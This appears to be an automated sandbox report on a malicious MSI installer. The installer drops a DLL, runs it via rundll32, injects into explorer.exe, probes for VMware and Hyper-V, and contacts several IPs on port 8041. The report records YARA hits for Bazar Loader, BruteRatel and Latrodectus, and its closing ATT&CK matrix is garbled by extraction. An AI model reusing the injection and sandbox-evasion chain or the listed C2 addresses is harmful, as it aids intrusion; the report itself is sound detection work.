                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,9_2_00F28424
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,9_2_00F30610
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 1782Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8082Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4116Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 695Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4965Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9F0E.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9EBE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9EEE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9E30.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\Installer\MSIA029.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-33658
                  Source: C:\Windows\Installer\MSIA029.tmpAPI coverage: 6.4 %
                  Source: C:\Windows\System32\rundll32.exeAPI coverage: 5.5 %
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep count: 1782 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep time: -106920000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep count: 8082 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep time: -484920000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep count: 4116 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep time: -4116000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6584Thread sleep count: 695 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6584Thread sleep time: -69500s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep count: 4965 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep time: -4965000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6AF79 FindFirstFileExW,4_2_00F6AF79
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,9_2_00F2A8E0
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,9_2_00F22B28
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW2
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805248446.0000016AD0D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
                  Source: explorer.exe, 00000009.00000003.2282491721.000000000C3FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                  Source: explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                  Source: explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000009.00000000.1792832688.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                  Source: explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-32680
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F3D0A5 IsDebuggerPresent,OutputDebugStringW,4_2_00F3D0A5
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F62DCC mov ecx, dword ptr fs:[00000030h]4_2_00F62DCC
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6AD78 mov eax, dword ptr fs:[00000030h]4_2_00F6AD78
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F32310 GetProcessHeap,4_2_00F32310
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F533A8
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5353F SetUnhandledExceptionFilter,4_2_00F5353F
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00F52968
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F56E1B
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018005C2BC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: F20000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject threads in other processes
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF457370100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF457370100
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,6_2_0000000273F41380
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: F20000Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: F20000 value starts with: 4D5AJump to behavior
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\System32\rundll32.exeMemory written: PID: 4056 base: F20000 value: 4DJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Sets debug register (to hijack the execution of another thread)
                  Source: C:\Windows\System32\rundll32.exeThread register set: 7656 1Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: F20000Jump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F352F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_00F352F0
                  Source: explorer.exe, 00000009.00000003.3081124828.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                  Source: explorer.exe, 00000009.00000000.1789616621.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3794284200.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                  Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F535A9 cpuid 4_2_00F535A9
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F6E0C6
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F6E1AC
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F67132
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F6E111
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00F6E237
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoEx,4_2_00F523F8
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,4_2_00F6E48A
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00F6E5B3
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,4_2_00F6E6B9
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,4_2_00F676AF
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00F6E788
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00F6DE24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0000000180053038
                  Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_0000000180052534
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180052904
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800529D4
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,6_2_0000000180048A24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047A78
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047C44
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0000000180052E38
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F537D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00F537D5
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F28D3C GetUserNameA,wsprintfA,9_2_00F28D3C
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F67B1F GetTimeZoneInformation,4_2_00F67B1F
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F300E8 RtlGetVersion,9_2_00F300E8

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Bazar Loader
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2700000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected BruteRatel
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Yara detected Latrodectus
                  Source: Yara matchFile source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4056, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Bazar Loader
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2700000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected BruteRatel
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Yara detected Latrodectus
                  Source: Yara matchFile source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4056, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Replication Through Removable Media                  		1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		21
                  Input Capture                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop Protocol21
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)92
                  Process Injection                  		2
                  Obfuscated Files or Information                  		Security Account Manager1
                  Account Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS2
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion                  		LSA Secrets34
                  System Information Discovery                  		SSHKeylogging113
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                  Masquerading                  		Cached Domain Credentials21
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion                  		DCSync11
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job92
                  Process Injection                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Rundll32                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
